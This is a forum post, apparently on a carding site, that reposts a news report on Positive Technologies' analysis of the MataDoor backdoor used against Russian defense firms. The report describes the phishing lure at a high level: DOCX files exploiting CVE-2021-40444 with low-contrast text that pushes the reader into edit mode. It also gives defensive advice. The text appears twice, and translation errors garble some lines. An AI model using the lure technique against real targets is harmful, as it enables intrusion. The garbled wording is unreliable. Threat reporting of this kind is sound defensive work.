CarderPlanet
Professional
Research by Positive Technologies reveals a new threat to the Russian defense complex.
A new group-the operator of a dangerous military-industrial complex, which researchers called Dark River, purposefully attacks enterprises of the Russian defense complex, investing serious financial and intellectual resources in the development of its tools. The highly developed architecture and transport system allow the backdoor to operate unnoticed in the compromised infrastructure for a long time in order to spy and steal confidential information.
For the first time, PT Expert Security Center (PT ESC) specialists have thoroughly investigated the internal structure and mechanisms of operation of the complex modular MataDoor backdoor discovered during the investigation of an incident last year. Dark River carefully approaches the choice of its victims and acts precisely. Currently, several cases of MataDoor's use in cyber attacks are known, all of them were aimed at large organizations associated with the military-industrial complex. The backdoor is well disguised: the names of its executable files are similar to the names of legal software installed on infected devices, and a number of samples have a valid digital signature. To make malware detection as difficult as possible, its developers used various types of wrapper utilities that hide malicious code.
"The main feature of the MataDoor backdoor is that it has a complex architecture," said Maxim Andreev, Senior Specialist in the Information Security Threat Research Department at Positive Technologies. - Code analysis shows that serious resources were invested in the development of this tool. This is a well-designed malware with deep individual development in terms of transport, stealth and architecture. Yandex. Grouping did not use boxed solutions. Many protocols were intentionally implemented by the developer on their own. A large and complex transport system allows you to flexibly configure communication with the operator's team, with the server, in order to remain hidden and unnoticed. This malware can operate even in logically isolated networks, pulling and transmitting data from anywhere."
Researchers believe that the introduction of a backdoor begins with a phishing email, to which attackers attach a document in DOCX format dedicated to the field of activity of the attacked enterprise. A special feature of the backdoor is that it prompts the recipient to enable document editing mode — just opening the attachment is not enough. This is a prerequisite for working out the exploit. Similar emails containing documents with exploits for the CVE-2021-40444 vulnerability were sent to Russian defense industry enterprises in August-September 2022. For example, attackers intentionally used a low-contrast font in the document text. To read it, the user changed the font color by starting the edit mode. At the same time, malicious payloads were downloaded and executed from a resource controlled by cybercriminals.
To protect corporate systems from the introduction of the MataDoor backdoor, Positive Technologies experts recommend taking proactive measures: use sandboxes that allow you to detect even such complex HPE by analyzing file behavior in a virtual environment, as well as traffic analyzers. Dark River uses email phishing, so experts advise you to adhere to the standard rules of cyber hygiene: be careful about incoming emails, messages in messengers and social networks, do not click on dubious links and do not open suspicious attachments. Since cybercriminals used hacked mailboxes in some attacks, it should be taken into account that they can resort to social engineering. In this regard, you should also carefully evaluate the following aspects: whether the email contains attachments that are not typical for correspondence in your company, whether the signature is correct, whether the sender could have written to you, and whether his question is within your competence.
A new group-the operator of a dangerous military-industrial complex, which researchers called Dark River, purposefully attacks enterprises of the Russian defense complex, investing serious financial and intellectual resources in the development of its tools. The highly developed architecture and transport system allow the backdoor to operate unnoticed in the compromised infrastructure for a long time in order to spy and steal confidential information.
For the first time, PT Expert Security Center (PT ESC) specialists have thoroughly investigated the internal structure and mechanisms of operation of the complex modular MataDoor backdoor discovered during the investigation of an incident last year. Dark River carefully approaches the choice of its victims and acts precisely. Currently, several cases of MataDoor's use in cyber attacks are known, all of them were aimed at large organizations associated with the military-industrial complex. The backdoor is well disguised: the names of its executable files are similar to the names of legal software installed on infected devices, and a number of samples have a valid digital signature. To make malware detection as difficult as possible, its developers used various types of wrapper utilities that hide malicious code.
"The main feature of the MataDoor backdoor is that it has a complex architecture," said Maxim Andreev, Senior Specialist in the Information Security Threat Research Department at Positive Technologies. - Code analysis shows that serious resources were invested in the development of this tool. This is a well-designed malware with deep individual development in terms of transport, stealth and architecture. Yandex. Grouping did not use boxed solutions. Many protocols were intentionally implemented by the developer on their own. A large and complex transport system allows you to flexibly configure communication with the operator's team, with the server, in order to remain hidden and unnoticed. This malware can operate even in logically isolated networks, pulling and transmitting data from anywhere."
Researchers believe that the introduction of a backdoor begins with a phishing email, to which attackers attach a document in DOCX format dedicated to the field of activity of the attacked enterprise. A special feature of the backdoor is that it prompts the recipient to enable document editing mode — just opening the attachment is not enough. This is a prerequisite for working out the exploit. Similar emails containing documents with exploits for the CVE-2021-40444 vulnerability were sent to Russian defense industry enterprises in August-September 2022. For example, attackers intentionally used a low-contrast font in the document text. To read it, the user changed the font color by starting the edit mode. At the same time, malicious payloads were downloaded and executed from a resource controlled by cybercriminals.
To protect corporate systems from the introduction of the MataDoor backdoor, Positive Technologies experts recommend taking proactive measures: use sandboxes that allow you to detect even such complex HPE by analyzing file behavior in a virtual environment, as well as traffic analyzers. Dark River uses email phishing, so experts advise you to adhere to the standard rules of cyber hygiene: be careful about incoming emails, messages in messengers and social networks, do not click on dubious links and do not open suspicious attachments. Since cybercriminals used hacked mailboxes in some attacks, it should be taken into account that they can resort to social engineering. In this regard, you should also carefully evaluate the following aspects: whether the email contains attachments that are not typical for correspondence in your company, whether the signature is correct, whether the sender could have written to you, and whether his question is within your competence.
